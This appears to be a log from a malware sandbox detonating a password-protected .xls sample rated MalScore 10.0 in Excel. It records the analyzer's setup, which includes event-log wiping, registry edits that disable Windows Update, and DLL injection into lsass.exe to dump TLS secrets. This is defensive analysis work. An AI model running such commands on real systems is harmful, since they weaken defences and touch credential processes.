Analysis

Category Package Started Completed Duration Options Log(s) MalScore
FILE 2025-12-08 16:39:19 2025-12-08 16:42:46 207 seconds Show Options Show Analysis Log 10.0
vnc_port=5902
2025-12-06 09:30:10,797 [root] INFO: Date set to: 20251208T08:31:54, timeout set to: 180
2025-12-08 08:31:54,000 [root] DEBUG: Starting analyzer from: C:\tmp76j_8pz8
2025-12-08 08:31:54,000 [root] DEBUG: Storing results at: C:\WcVPSdVSz
2025-12-08 08:31:54,000 [root] DEBUG: Pipe server name: \\.\PIPE\jjqmXQQK
2025-12-08 08:31:54,000 [root] DEBUG: Python path: C:\Python38
2025-12-08 08:31:54,000 [root] INFO: analysis running as an admin
2025-12-08 08:31:54,000 [root] DEBUG: no analysis package configured, picking one for you
2025-12-08 08:31:54,000 [root] INFO: analysis package selected: "zip"
2025-12-08 08:31:54,000 [root] DEBUG: importing analysis package module: "modules.packages.zip"...
2025-12-08 08:31:54,015 [root] DEBUG: imported analysis package "zip"
2025-12-08 08:31:54,015 [root] DEBUG: initializing analysis package "zip"...
2025-12-08 08:31:54,015 [lib.common.common] INFO: wrapping
2025-12-08 08:31:54,015 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:54,015 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9.zip
2025-12-08 08:31:54,015 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL option
2025-12-08 08:31:54,015 [root] INFO: Analyzer: Package modules.packages.zip does not specify a DLL_64 option
2025-12-08 08:31:54,015 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader option
2025-12-08 08:31:54,015 [root] INFO: Analyzer: Package modules.packages.zip does not specify a loader_64 option
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 08:31:54,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 08:31:54,078 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 08:31:54,078 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 08:31:54,109 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-08 08:31:54,109 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 08:31:54,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 08:31:54,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 08:31:54,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 08:31:54,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 08:31:54,125 [modules.auxiliary.disguise] INFO: Disguising GUID to 240173b0-7d0e-4a3d-9104-722cfed1383c
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 08:31:54,125 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 08:31:54,125 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 08:31:54,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 08:31:54,125 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 08:31:54,125 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 08:31:54,125 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 08:31:54,125 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 08:31:54,125 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 08:31:54,140 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 08:31:54,140 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 08:31:54,140 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 08:31:54,140 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 08:31:54,140 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 08:31:54,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 08:31:54,249 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 08:31:54,249 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 08:31:54,249 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 08:31:54,249 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 08:31:54,249 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 08:31:54,249 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 392
2025-12-08 08:31:54,249 [lib.api.process] INFO: Monitor config for <Process 392 lsass.exe>: C:\tmp76j_8pz8\dll\392.ini
2025-12-08 08:31:54,249 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 08:31:54,265 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 08:31:54,265 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:31:54,265 [root] DEBUG: Loader: Injecting process 392 with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:31:54,281 [root] DEBUG: 392: Python path set to 'C:\Python38'.
2025-12-08 08:31:54,296 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:54,296 [root] DEBUG: 392: TLS secret dump mode enabled.
2025-12-08 08:31:54,296 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 08:31:54,296 [root] DEBUG: 392: Monitor initialised: 32-bit capemon loaded in process 392 at 0x6c9a0000, thread 3144, image base 0x570000, stack from 0x10b6000-0x10c0000
2025-12-08 08:31:54,296 [root] DEBUG: 392: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 08:31:54,312 [root] DEBUG: 392: Hooked 5 out of 5 functions
2025-12-08 08:31:54,312 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:54,312 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:31:54,312 [lib.api.process] INFO: Injected into 32-bit <Process 392 lsass.exe>
2025-12-08 08:31:54,312 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 08:31:54,312 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 08:31:54,312 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 08:31:54,312 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 08:31:54,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 08:31:54,312 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 08:31:54,312 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 08:31:54,312 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 08:31:54,312 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 08:31:54,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 08:31:54,312 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 08:31:54,328 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 08:31:54,375 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 08:31:54,390 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 08:31:54,406 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 08:31:54,421 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 08:31:54,437 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 08:31:54,453 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 08:31:54,453 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 08:31:54,484 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 08:31:54,484 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 08:31:54,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 08:31:54,515 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 08:31:54,531 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 08:31:54,562 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 08:31:54,562 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 08:31:54,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 08:31:54,578 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 08:31:54,593 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 08:31:54,609 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 08:31:54,609 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 08:31:54,625 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 08:31:54,640 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 08:31:54,671 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 08:31:54,687 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 08:31:54,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 08:31:54,718 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 08:31:54,734 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 08:31:54,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 08:31:54,765 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:54,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:54,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 08:31:54,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 08:31:54,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 08:31:54,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 08:31:54,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 08:31:54,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 08:31:54,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 08:31:54,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 08:31:54,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 08:31:54,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 08:31:54,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 08:31:54,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 08:31:55,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 08:31:55,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 08:31:55,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 08:31:55,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 08:31:55,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 08:31:55,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 08:31:55,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 08:31:55,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 08:31:55,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 08:31:55,156 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 08:31:55,171 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 08:31:55,187 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 08:31:55,187 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 08:31:55,203 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 08:31:55,218 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 08:31:55,234 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 08:31:55,249 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 08:31:55,265 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 08:31:55,281 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 08:31:59,531 [root] INFO: Restarting WMI Service
2025-12-08 08:32:01,546 [root] DEBUG: package modules.packages.zip does not support configure, ignoring
2025-12-08 08:32:01,546 [root] WARNING: configuration error for package modules.packages.zip: error importing data.packages.zip: No module named 'data.packages'
2025-12-08 08:32:01,546 [lib.common.zip_utils] DEBUG: Archive is encrypted, using default password value: infected
2025-12-08 08:32:01,546 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'l', 'C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip']
2025-12-08 08:32:01,578 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'x', '-p', '-y', '-oC:\\Users\\user\\AppData\\Local\\Temp', 'C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip']
2025-12-08 08:32:01,593 [lib.common.zip_utils] DEBUG: b'\r\n7-Zip 22.01 (x86) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15\r\n\r\nScanning the drive for archives:\r\n1 file, 15218 bytes (15 KiB)\r\n\r\nExtracting archive: C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip\r\n--\r\nPath = C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip\r\nType = zip\r\nPhysical Size = 15218\r\n\r\n\r\nSub items Errors: 1\r\n\r\nArchives with Errors: 1\r\n\r\nSub items Errors: 1\r\n' b'ERROR: Wrong password : 72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls\r\n'
2025-12-08 08:32:01,593 [lib.common.zip_utils] DEBUG: ['C:\\Program Files\\7-Zip\\7z.exe', 'x', '-pinfected', '-y', '-oC:\\Users\\user\\AppData\\Local\\Temp', 'C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip']
2025-12-08 08:32:01,625 [lib.common.zip_utils] DEBUG: b'\r\n7-Zip 22.01 (x86) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15\r\n\r\nScanning the drive for archives:\r\n1 file, 15218 bytes (15 KiB)\r\n\r\nExtracting archive: C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip\r\n--\r\nPath = C:\\Users\\user\\AppData\\Local\\Temp\\72a01610de72cacddef9.zip\r\nType = zip\r\nPhysical Size = 15218\r\n\r\nEverything is Ok\r\n\r\nSize:       35328\r\nCompressed: 15218\r\n' b''
2025-12-08 08:32:01,625 [lib.common.zip_utils] INFO: Uploading C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls to host
2025-12-08 08:32:01,625 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls to files/72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b; Size is 35328; Max size: 100000000
2025-12-08 08:32:01,640 [modules.packages.zip] DEBUG: Missing file option, auto executing: ['72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls']
2025-12-08 08:32:01,640 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:32:01,906 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls" /q" with pid 3284
2025-12-08 08:32:01,906 [lib.api.process] INFO: Monitor config for <Process 3284 EXCEL.EXE>: C:\tmp76j_8pz8\dll\3284.ini
2025-12-08 08:32:01,906 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:01,906 [root] DEBUG: Loader: Injecting process 3284 (thread 2972) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:01,906 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:01,906 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:01,937 [lib.api.process] INFO: Injected into 32-bit <Process 3284 EXCEL.EXE>
2025-12-08 08:32:03,937 [lib.api.process] INFO: Successfully resumed <Process 3284 EXCEL.EXE>
2025-12-08 08:32:04,046 [root] DEBUG: 3284: Python path set to 'C:\Python38'.
2025-12-08 08:32:04,046 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:04,046 [root] DEBUG: 3284: Dropped file limit defaulting to 100.
2025-12-08 08:32:04,125 [root] DEBUG: 3284: Microsoft Office settings enabled.
2025-12-08 08:32:04,125 [root] DEBUG: 3284: Monitor initialised: 32-bit capemon loaded in process 3284 at 0x6c9a0000, thread 2972, image base 0x1190000, stack from 0x2c6000-0x2d0000
2025-12-08 08:32:04,125 [root] DEBUG: 3284: Commandline: "C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\72a01610de72cacddef9297c415389d17ae9069d74ce742171ce3be65b27366b.xls" /q
2025-12-08 08:32:04,125 [root] DEBUG: 3284: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:04,140 [root] DEBUG: 3284: Hooked 434 out of 434 functions
2025-12-08 08:32:04,140 [root] DEBUG: 3284: WoW64 not detected.
2025-12-08 08:32:04,140 [root] INFO: Loaded monitor into process with pid 3284
2025-12-08 08:32:04,562 [root] DEBUG: 3284: DLL loaded at 0x6B4A0000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client (0x40d000 bytes).
2025-12-08 08:32:04,562 [root] DEBUG: 3284: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:04,593 [root] DEBUG: 3284: DLL loaded at 0x6AF90000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso30win32client (0x504000 bytes).
2025-12-08 08:32:04,671 [root] DEBUG: 3284: DLL loaded at 0x6A610000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client (0x974000 bytes).
2025-12-08 08:32:04,671 [root] DEBUG: 3284: DLL loaded at 0x73FD0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus (0x190000 bytes).
2025-12-08 08:32:04,671 [root] DEBUG: 3284: DLL loaded at 0x73E80000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 08:32:04,687 [root] DEBUG: 3284: DLL loaded at 0x6DB40000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso50win32client (0x81000 bytes).
2025-12-08 08:32:04,765 [root] DEBUG: 3284: DLL loaded at 0x69C00000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso98win32client (0xa09000 bytes).
2025-12-08 08:32:04,765 [root] DEBUG: 3284: DLL loaded at 0x73C10000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2025-12-08 08:32:04,921 [root] DEBUG: 3284: DLL loaded at 0x686F0000: C:\Program Files\Common Files\Microsoft Shared\Office16\mso (0x1504000 bytes).
2025-12-08 08:32:04,937 [root] DEBUG: 3284: DLL loaded at 0x72CE0000: C:\Windows\system32\msi (0x246000 bytes).
2025-12-08 08:32:04,984 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\{A10036B2-3394-42E4-84B5-CED1890283B7} - OProcSessId.dat
2025-12-08 08:32:05,000 [root] DEBUG: 3284: DLL loaded at 0x68180000: C:\Windows\system32\d2d1 (0x347000 bytes).
2025-12-08 08:32:05,015 [root] DEBUG: 3284: DLL loaded at 0x743F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2025-12-08 08:32:05,015 [root] DEBUG: 3284: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:05,015 [root] DEBUG: 3284: DLL loaded at 0x75070000: C:\Windows\system32\WINSTA (0x29000 bytes).
2025-12-08 08:32:05,015 [root] DEBUG: 3284: DLL loaded at 0x6F7A0000: C:\Windows\system32\dxgi (0x4c000 bytes).
2025-12-08 08:32:05,015 [root] DEBUG: 3284: DLL loaded at 0x74960000: C:\Windows\system32\VERSION (0x9000 bytes).
2025-12-08 08:32:05,031 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,031 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:05,031 [root] DEBUG: 3284: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:05,031 [root] DEBUG: 3284: DLL loaded at 0x75630000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2025-12-08 08:32:05,046 [root] DEBUG: 3284: DLL loaded at 0x75F60000: C:\Windows\system32\setupapi (0x19d000 bytes).
2025-12-08 08:32:05,046 [root] DEBUG: 3284: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
